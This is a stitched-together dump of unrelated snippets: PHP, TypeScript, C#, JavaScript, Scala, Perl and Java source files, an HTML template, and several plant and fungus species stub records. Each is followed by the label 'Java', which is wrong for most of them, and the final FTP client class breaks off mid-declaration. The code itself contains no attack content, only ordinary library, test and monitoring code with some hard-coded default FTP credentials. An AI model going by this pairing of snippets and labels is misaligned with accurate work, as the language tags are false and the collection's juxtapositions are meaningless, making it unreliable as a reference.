@return MarketplaceWebService_Model_ErrorResponse instance */ public function withRequestId($value) { $this->setRequestId($value); return $this; } /** * Checks if RequestId is set. * * @return bool true if RequestId is set */ public function isSetRequestId() { return !is_null($this->fields['RequestId']['FieldValue']); } /** * XML Representation for this object. 
* * @return string XML for this object */ public function toXML() { $xml = ''; $xml .= '<ErrorResponse xmlns="http://mws.amazonaws.com/doc/2009-01-01/">'; $xml .= $this->_toXMLFragment(); $xml .= '</ErrorResponse>'; return $xml; } private $_responseHeaderMetadata = null; public function getResponseHeaderMetadata() { return $this->_responseHeaderMetadata; } public function setResponseHeaderMetadata($responseHeaderMetadata) { return $this->_responseHeaderMetadata = $responseHeaderMetadata; } }
Java
# Salix farinosa Hartig SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Taraxacum humbertii Maire SPECIES #### Status ACCEPTED #### According to Euro+Med Plantbase #### Published in null #### Original name null ### Remarks null
Java
# Diplodia cyparissa Cooke & Harkn. SPECIES #### Status ACCEPTED #### According to Index Fungorum #### Published in Grevillea 9(no. 51): 83 (1881) #### Original name Diplodia cyparissa Cooke & Harkn. ### Remarks null
Java
# Bulbophyllum scyphochilus Schltr. SPECIES #### Status ACCEPTED #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
# Coscinodiscopsis jonesiana (Greville) E.A. Sar & I. Sunesen in Sar, Suneson & Hinz, 2008 SPECIES #### Status ACCEPTED #### According to World Register of Marine Species #### Published in null #### Original name null ### Remarks null
Java
# Cinnamomum citriodorum Thwaites SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Tecoma avellanedae Speg. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Cercanthemum squamiferum Tiegh. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Strobilanthes hirsuta Decne. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Matayba atropurpurea Radlk. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Nephelea arborea (L.) Sehnem SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
<!-- Portfolio Grid Section -->
<section id="portfolio" class="bg-light-gray">
    <div class="container">
        <div class="row">
            <div class="col-lg-12 text-center">
                <h2 class="section-heading">Portfolio</h2>
                <h3 class="section-subheading text-muted"></h3>
            </div>
        </div>
        <div class="row">
            {% for post in site.posts %}
            <div class="col-md-4 col-sm-6 portfolio-item">
                <a href="#portfolioModal{{ post.modal-id }}" class="portfolio-link" data-toggle="modal">
                    <div class="portfolio-hover">
                        <div class="portfolio-hover-content">
                            <i class="fa fa-plus fa-3x"></i>
                        </div>
                    </div>
                    <img src="img/portfolio/{{ post.thumbnail }}" class="img-responsive img-centered" alt="{{ post.alt }}">
                </a>
                <div class="portfolio-caption">
                    <h4>{{ post.title }}</h4>
                    <p class="text-muted">{{ post.subtitle }}</p>
                </div>
            </div>
            {% endfor %}
        </div>
    </div>
</section>
Java
/*
 * Copyright 2019 ThoughtWorks, Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

import {ApiRequestBuilder, ApiVersion} from "helpers/api_request_builder";
import SparkRoutes from "helpers/spark_routes";

/**
 * Request payload for bulk-updating system administrators: lists of user
 * names to add to and/or remove from the admin role in a single call.
 */
export interface BulkUpdateSystemAdminJSON {
  operations: {
    users: {
      add?: string[],
      remove?: string[]
    }
  };
}

/**
 * Thin API client for the system-admins endpoint (presumably GoCD's
 * /api/admin/security/system_admins — confirm against SparkRoutes).
 */
export class AdminsCRUD {
  // Every request is pinned to v2 of the API so server-side changes to the
  // default version cannot silently alter the response shape.
  static API_VERSION_HEADER = ApiVersion.v2;

  /** Fetches the current set of system administrators. */
  static all() {
    return ApiRequestBuilder.GET(SparkRoutes.apisystemAdminsPath(), this.API_VERSION_HEADER);
  }

  /** Adds/removes users from the system-admin role via a single PATCH. */
  static bulkUpdate(bulkUpdateSystemAdminJson: BulkUpdateSystemAdminJSON) {
    return ApiRequestBuilder.PATCH(SparkRoutes.apisystemAdminsPath(), this.API_VERSION_HEADER,
                                   {payload: bulkUpdateSystemAdminJson});
  }
}
Java
/*
 * Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
 * the License. A copy of the License is located at
 *
 * http://aws.amazon.com/apache2.0
 *
 * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
 * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
 * and limitations under the License.
 */
package com.amazonaws.services.iotevents.model;

import java.io.Serializable;
import javax.annotation.Generated;

/**
 *
 * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/iotevents-2018-07-27/UntagResource" target="_top">AWS API
 *      Documentation</a>
 */
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class UntagResourceResult extends com.amazonaws.AmazonWebServiceResult<com.amazonaws.ResponseMetadata> implements Serializable, Cloneable {

    /**
     * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be
     * redacted from this string using a placeholder value.
     *
     * @return A string representation of this object.
     *
     * @see java.lang.Object#toString()
     */
    @Override
    public String toString() {
        // This result type carries no fields, so the rendered member list is
        // always empty.
        return "{}";
    }

    @Override
    public boolean equals(Object obj) {
        if (this == obj) {
            return true;
        }
        // instanceof is false for null, so this also rejects null references.
        if (!(obj instanceof UntagResourceResult)) {
            return false;
        }
        // No fields to compare: any two instances are equal.
        return true;
    }

    @Override
    public int hashCode() {
        // Constant hash, consistent with equals() treating all instances as equal.
        return 1;
    }

    @Override
    public UntagResourceResult clone() {
        try {
            return (UntagResourceResult) super.clone();
        } catch (CloneNotSupportedException e) {
            throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e);
        }
    }

}
Java
// Copyright (c) kuicker.org. All rights reserved.
// Modified By  YYYY-MM-DD
//   kevinjong  2016-02-11 - Creation

using System.IO;
using System.Linq;
using Xunit;

namespace IsTo.Tests
{
	public class TestHelper
	{
		// Asserts that two streams contain exactly the same byte sequence,
		// comparing them chunk by chunk from their current positions.
		internal static void StreamComparison(
			Stream stream1,
			Stream stream2)
		{
			const int bufferSize = 2048;
			var buffer1 = new byte[bufferSize];
			var buffer2 = new byte[bufferSize];

			while(true) {
				// Fill each buffer completely (or to EOF) before comparing.
				// A single Stream.Read call may legally return fewer bytes
				// than requested even when more data remains, so comparing
				// one-shot read counts could report a spurious mismatch for
				// identical streams.
				var count1 = ReadAtMost(stream1, buffer1);
				var count2 = ReadAtMost(stream2, buffer2);

				Assert.True(count1 == count2);
				if(count1 == 0) {
					// Both streams reached EOF together: contents are equal.
					return;
				}

				Assert.True(
					buffer1
						.Take(count1)
						.SequenceEqual(buffer2.Take(count2))
				);
			}
		}

		// Reads until the buffer is full or the stream is exhausted; returns
		// the number of bytes actually read (0 only at EOF).
		private static int ReadAtMost(Stream stream, byte[] buffer)
		{
			var total = 0;
			while(total < buffer.Length) {
				var read = stream.Read(buffer, total, buffer.Length - total);
				if(read == 0) {
					break;
				}
				total += read;
			}
			return total;
		}
	}
}
Java
/* * Copyright 2020 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/aiplatform/v1/model_service.proto package com.google.cloud.aiplatform.v1; /** * * * <pre> * Response message of [ModelService.ExportModel][google.cloud.aiplatform.v1.ModelService.ExportModel] operation. * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ExportModelResponse} */ public final class ExportModelResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1.ExportModelResponse) ExportModelResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ExportModelResponse.newBuilder() to construct. 
private ExportModelResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ExportModelResponse() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ExportModelResponse(); } @java.lang.Override public final com.google.protobuf.UnknownFieldSet getUnknownFields() { return this.unknownFields; } private ExportModelResponse( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { this(); if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } com.google.protobuf.UnknownFieldSet.Builder unknownFields = com.google.protobuf.UnknownFieldSet.newBuilder(); try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; default: { if (!parseUnknownField(input, unknownFields, extensionRegistry, tag)) { done = true; } break; } } } } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(this); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); } finally { this.unknownFields = unknownFields.build(); makeExtensionsImmutable(); } } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ExportModelResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ExportModelResponse.class, com.google.cloud.aiplatform.v1.ExportModelResponse.Builder.class); } private byte 
memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { unknownFields.writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; size += unknownFields.getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.aiplatform.v1.ExportModelResponse)) { return super.equals(obj); } com.google.cloud.aiplatform.v1.ExportModelResponse other = (com.google.cloud.aiplatform.v1.ExportModelResponse) obj; if (!unknownFields.equals(other.unknownFields)) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (29 * hash) + unknownFields.hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( 
com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static 
com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.aiplatform.v1.ExportModelResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message of [ModelService.ExportModel][google.cloud.aiplatform.v1.ModelService.ExportModel] operation. 
* </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ExportModelResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1.ExportModelResponse) com.google.cloud.aiplatform.v1.ExportModelResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ExportModelResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ExportModelResponse.class, com.google.cloud.aiplatform.v1.ExportModelResponse.Builder.class); } // Construct using com.google.cloud.aiplatform.v1.ExportModelResponse.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} } @java.lang.Override public Builder clear() { super.clear(); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor; } @java.lang.Override public com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstanceForType() { return com.google.cloud.aiplatform.v1.ExportModelResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloud.aiplatform.v1.ExportModelResponse build() { 
com.google.cloud.aiplatform.v1.ExportModelResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.aiplatform.v1.ExportModelResponse buildPartial() { com.google.cloud.aiplatform.v1.ExportModelResponse result = new com.google.cloud.aiplatform.v1.ExportModelResponse(this); onBuilt(); return result; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.aiplatform.v1.ExportModelResponse) { return mergeFrom((com.google.cloud.aiplatform.v1.ExportModelResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.aiplatform.v1.ExportModelResponse other) { if (other == com.google.cloud.aiplatform.v1.ExportModelResponse.getDefaultInstance()) return this; this.mergeUnknownFields(other.unknownFields); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( 
com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { com.google.cloud.aiplatform.v1.ExportModelResponse parsedMessage = null; try { parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { parsedMessage = (com.google.cloud.aiplatform.v1.ExportModelResponse) e.getUnfinishedMessage(); throw e.unwrapIOException(); } finally { if (parsedMessage != null) { mergeFrom(parsedMessage); } } return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1.ExportModelResponse) } // @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1.ExportModelResponse) private static final com.google.cloud.aiplatform.v1.ExportModelResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1.ExportModelResponse(); } public static com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ExportModelResponse> PARSER = new com.google.protobuf.AbstractParser<ExportModelResponse>() { @java.lang.Override public ExportModelResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return new ExportModelResponse(input, extensionRegistry); } }; public static com.google.protobuf.Parser<ExportModelResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ExportModelResponse> getParserForType() { return PARSER; 
} @java.lang.Override public com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
Java
/*!
 * Module requirements
 */

var NeopreneError = require('../error')

/**
 * Document Validation Error
 *
 * Raised when a document fails validation; per-field failures are collected
 * on `this.errors`, which is the same object as `instance.errors`.
 *
 * @api private
 * @param {Document} instance
 * @inherits NeopreneError
 */

function ValidationError (instance) {
  NeopreneError.call(this, "Validation failed");
  // Reference the constructor directly: `arguments.callee` is deprecated
  // and throws a TypeError in strict mode.
  Error.captureStackTrace(this, ValidationError);
  this.name = 'ValidationError';
  // Shared object: mutating `this.errors` also updates `instance.errors`.
  this.errors = instance.errors = {};
};

/*!
 * Inherits from NeopreneError.
 * Object.create replaces the former non-standard `__proto__` assignment.
 */

ValidationError.prototype = Object.create(NeopreneError.prototype);
ValidationError.prototype.constructor = ValidationError;

/**
 * Console.log helper
 *
 * Renders "ValidationError: <err1>, <err2>, ..." from the collected errors.
 *
 * @api private
 */

ValidationError.prototype.toString = function () {
  return this.name + ': ' + Object.keys(this.errors).map(function (key) {
    return String(this.errors[key]);
  }, this).join(', ');
};

/*!
 * Module exports
 */

module.exports = exports = ValidationError;
Java
package com.twitter.tiny

import com.google.inject.Stage
import com.twitter.finatra.http.test.EmbeddedHttpServer
import com.twitter.inject.server.FeatureTest

/**
 * Startup smoke test: boots TinyUrlServer inside an embedded HTTP server
 * and asserts that the app reports a successful start.
 * Stage.PRODUCTION presumably forces eager singleton creation so that
 * misconfigured bindings fail here rather than on first request — confirm
 * against the Guice Stage documentation.
 */
class TinyUrlServerStartupTest extends FeatureTest {

  // Server under test, wired exactly as in deployment (PRODUCTION stage).
  override val server = new EmbeddedHttpServer(
    stage = Stage.PRODUCTION,
    twitterServer = new TinyUrlServer)

  "Server" should {
    "startup" in {
      // Succeeds once the underlying TwitterServer signals it has started.
      server.assertAppStarted()
    }
  }
}
Java
#
# Copyright 2019 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

# Component checker for HP ProLiant Drive Array (DA) logical drives,
# polled over SNMP via the CPQIDA MIB.
package hardware::server::hp::proliant::snmp::mode::components::daldrive;

use strict;
use warnings;

# cpqDaLogDrvCondition integer -> human-readable condition.
my %map_daldrive_condition = (
    1 => 'other',
    2 => 'ok',
    3 => 'degraded',
    4 => 'failed',
);

# cpqDaLogDrvStatus integer -> human-readable logical-drive status.
my %map_ldrive_status = (
    1 => 'other',
    2 => 'ok',
    3 => 'failed',
    4 => 'unconfigured',
    5 => 'recovering',
    6 => 'readyForRebuild',
    7 => 'rebuilding',
    8 => 'wrongDrive',
    9 => 'badConnect',
    10 => 'overheating',
    11 => 'shutdown',
    12 => 'expanding',
    13 => 'notAvailable',
    14 => 'queuedForExpansion',
    15 => 'multipathAccessDegraded',
    16 => 'erasing',
);

# cpqDaLogDrvFaultTol integer -> fault-tolerance (RAID) level name.
# NOTE(review): value 6 is intentionally absent here — presumably skipped by
# the MIB itself; confirm against the CPQIDA-MIB definition.
my %map_faulttol = (
    1 => 'other',
    2 => 'none',
    3 => 'mirroring',
    4 => 'dataGuard',
    5 => 'distribDataGuard',
    7 => 'advancedDataGuard',
    8 => 'raid50',
    9 => 'raid60',
);

# In 'CPQIDA-MIB.mib'
# Per-instance columns fetched from the cpqDaLogDrv table.
my $mapping = {
    cpqDaLogDrvFaultTol => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.3', map => \%map_faulttol },
    cpqDaLogDrvStatus => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.4', map => \%map_ldrive_status },
};
# Condition column is walked separately (it also drives instance discovery).
my $mapping2 = {
    cpqDaLogDrvCondition => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.11', map => \%map_daldrive_condition },
};
my $oid_cpqDaLogDrvEntry = '.1.3.6.1.4.1.232.3.2.3.1.1';
my $oid_cpqDaLogDrvCondition = '.1.3.6.1.4.1.232.3.2.3.1.1.11';

# Queue the SNMP requests for this component; results arrive later in
# $self->{results}, keyed by the table OIDs pushed here.
sub load {
    my ($self) = @_;

    push @{$self->{request}},
        { oid => $oid_cpqDaLogDrvEntry, start => $mapping->{cpqDaLogDrvFaultTol}->{oid}, end => $mapping->{cpqDaLogDrvStatus}->{oid} },
        { oid => $oid_cpqDaLogDrvCondition };
}

# Evaluate every discovered logical drive: log a long message per drive and
# raise the plugin severity when a drive's status maps to a non-OK level.
sub check {
    my ($self) = @_;

    $self->{output}->output_add(long_msg => "Checking da logical drives");
    $self->{components}->{daldrive} = {name => 'da logical drives', total => 0, skip => 0};
    return if ($self->check_filter(section => 'daldrive'));

    # Instances are discovered from the condition column walk; the numeric
    # suffix after the column OID is the table index.
    foreach my $oid ($self->{snmp}->oid_lex_sort(keys %{$self->{results}->{$oid_cpqDaLogDrvCondition}})) {
        next if ($oid !~ /^$mapping2->{cpqDaLogDrvCondition}->{oid}\.(.*)$/);
        my $instance = $1;
        my $result = $self->{snmp}->map_instance(mapping => $mapping, results => $self->{results}->{$oid_cpqDaLogDrvEntry}, instance => $instance);
        my $result2 = $self->{snmp}->map_instance(mapping => $mapping2, results => $self->{results}->{$oid_cpqDaLogDrvCondition}, instance => $instance);

        next if ($self->check_filter(section => 'daldrive', instance => $instance));
        $self->{components}->{daldrive}->{total}++;

        $self->{output}->output_add(long_msg => sprintf("da logical drive '%s' [fault tolerance: %s, condition: %s] status is %s.",
                                    $instance, $result->{cpqDaLogDrvFaultTol}, $result2->{cpqDaLogDrvCondition},
                                    $result->{cpqDaLogDrvStatus}));
        # Severity is derived from the drive *status* (not the condition).
        my $exit = $self->get_severity(section => 'daldrive', value => $result->{cpqDaLogDrvStatus});
        if (!$self->{output}->is_status(value => $exit, compare => 'ok', litteral => 1)) {
            $self->{output}->output_add(severity => $exit,
                                        short_msg => sprintf("da logical drive '%s' is %s",
                                            $instance, $result->{cpqDaLogDrvStatus}));
        }
    }
}

1;
Java
/*
 * Copyright 2005-2010 Ignis Software Tools Ltd. All rights reserved.
 */
package com.aqua.filetransfer.ftp;

import java.io.File;
import java.io.FileInputStream;
import java.util.Properties;

import jsystem.framework.JSystemProperties;
import jsystem.framework.system.SystemObjectImpl;
import jsystem.utils.FileUtils;
import jsystem.utils.ReflectionUtils;
import jsystem.utils.StringUtils;
import systemobject.terminal.Cli;
import systemobject.terminal.Prompt;

import com.aqua.sysobj.conn.CliConnection;
import com.aqua.sysobj.conn.CliConnectionImpl;
import com.aqua.sysobj.conn.CliFactory;

/**
 * <b>SystemObject for running FTP client on a remote machine.</b><br>
 * The main purpose of this system object is to enable file transfer
 * without assuming an FTP server is running on the remote machine.<br>
 * In a typical usage of this SystemObject, an embedded FTP server
 * will be activated on the local machine.
 * A {@link Cli} session is opened with the remote client; the session
 * activates the FTP client on the remote machine. <br>
 *
 * <u>Using FTPRemoteClient</u><br>
 * SystemObject can be instantiated from sut file or directly in the code.
 * Once initiated copy operations can be used.
 * The copy operations identify whether a connection is already open; if not
 * a connection is opened.<br>
 * In many cases the remote server (telnet/ssh) limits number of connections;
 * use the {@link #closeFTPSession()} to close connection when needed.<br>
 *
 * Passivation: since TAS 4.9 the sys object supports passivation. Please note that passivation
 * is only supported when the remote client is a linux machine.
 * In case the built-in prompts are not enough to open an FTP session
 * with the FTP server you are using, the system object also supports adding additional FTP prompts.
 * To do that write a property file called {@link #FILE_TRANSFER_PROPERTIES_FILE_NAME}
 * (in run directory) and add to it the following properties:
 * {@link #FTP_LOGIN_PROMPTS} - comma separated prompts which identify that
 * the FTP server waits for the user to enter the login user name
 *
 * {@link #FTP_PASSWORD_PROMPTS} - comma separated prompts which identify that
 * the FTP server waits for the user to enter the password
 *
 * {@link #FTP_PROMPTS} - comma separated prompts which identify that
 * the FTP server is waiting for an ftp command
 *
 * Since TAS 4.9 cli connectivity parameters can be set using CliConnection.
 * This can be done either by passing a CliConnection to the FtpRemoteClient constructor
 * or setting the <code>cliConnection</code> member through the SUT file.
 * When connectivity parameters are set using a CliConnection other connectivity
 * parameters are ignored (host,operatingSystem,protocol,port,user,password).
 *
 * FTP Server address:
 * -------------------
 * FTP Server address is fetched as following:
 * If the user gave value to the member {@link #ftpServerHostName} through the SUT file
 * or by activating its setter, this will be the server to which the remote ftp client will
 * try to connect.
 * Next, when connecting, the system object will try to fetch the property {@value #LOCAL_HOST_ADDRESS_PROPERTY}
 * from the jsystem.properties file; if the property was set it will use it as server address,
 * otherwise the system object uses java API to get local machine host name and uses it as server address.
 */
public class FTPRemoteClient extends SystemObjectImpl {

    // Optional property file (run directory) with extra FTP prompt definitions.
    public static final String FILE_TRANSFER_PROPERTIES_FILE_NAME = "filetransfer.properties";
    public static final String FTP_PROMPTS = "ftp.prompts";
    public static final String FTP_LOGIN_PROMPTS = "ftp.login.prompts";
    public static final String FTP_PASSWORD_PROMPTS = "ftp.password.prompts";
    public static final String LOCAL_HOST_ADDRESS_PROPERTY = "local.host.external.name";

    // When set (via SUT file or constructor) it overrides host/protocol/user/password below.
    public CliConnection cliConnection;

    private Cli cli;                       // lazily-opened CLI session to the remote client
    private String host;
    private String operatingSystem = CliFactory.OPERATING_SYSTEM_WINDOWS;
    private String protocol = "telnet";
    private int port = 23;
    private String user;
    private String password;
    private String ftpServerHostName;      // explicit FTP server address; see class doc
    private String ftpUserName = "aqua";
    private String ftpPassword = "aqua";
    private boolean ascii;                 // transfer mode: true=ascii, false=binary
    private Prompt[] ftpGeneralPrompts;    // prompts meaning "ftp client awaits a command"
